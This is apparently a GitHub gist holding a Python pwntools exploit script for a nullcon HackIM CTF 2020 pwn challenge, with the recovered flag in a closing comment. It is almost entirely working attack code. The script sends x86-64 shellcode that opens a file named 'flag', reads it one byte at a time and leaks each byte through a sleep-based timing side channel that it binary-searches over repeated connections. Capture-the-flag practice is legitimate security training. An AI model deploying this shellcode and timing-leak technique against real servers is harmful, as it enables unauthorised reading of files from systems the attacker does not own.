Skip to content

Instantly share code, notes, and snippets.

@KaoRz
Created February 9, 2020 04:06
Show Gist options
  • Save KaoRz/bd13d74db0f553bf55fc5185aff781c4 to your computer and use it in GitHub Desktop.
Save KaoRz/bd13d74db0f553bf55fc5185aff781c4 to your computer and use it in GitHub Desktop.
sleek boi script - nullcon HackIM CTF 2020
from pwn import *
import time
context.arch = "amd64"
HOST = "pwn4.ctf.nullcon.net"
PORT = 5003
def screen_clean():
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
def send_shellcode(io, offset, limit_intval):
shellcode = """
push 0x67616c66
mov rax, 2
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
syscall
push rax
mov rdi, rax
mov rax, 8
mov rsi, %d
mov rdx, 0
syscall
pop rdi
mov rax, 0
sub rsp, 8
mov rsi, rsp
mov rdx, 0x1
syscall
mov al, byte ptr [rsp]
cmp al, %d
jl crash
hit:
push 0
push 3
mov rdi, rsp
xor rsi, rsi
mov rax, 35
syscall
crash:
nop
""" % (offset, limit_intval)
io.sendline(asm(shellcode))
def bruteforce_char(offset):
base_limit = 0
top_limit = 128
for i in range(8):
io = remote(HOST, PORT)
screen_clean()
curr_limit = (int)((top_limit + base_limit) / 2)
send_shellcode(io, offset, curr_limit)
start = time.time()
try:
io.recv()
except EOFError as error:
pass
if time.time() - start > 3.0:
base_limit = curr_limit
else:
top_limit = curr_limit
log.info("Current character --> " + chr(curr_limit) + " (" + str(base_limit) + ", " + str(top_limit) + ")")
io.close()
screen_clean()
log.success("Char found --> " + chr(curr_limit))
return chr(curr_limit)
flag = ""
cnt = 0
while "}" not in flag:
flag += bruteforce_char(cnt)
log.info("Progress --> " + flag)
cnt += 1
log.success("FLAG --> " + flag)
# [+] FLAG --> hackim20{OMG_The_first_one_was_unintended}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment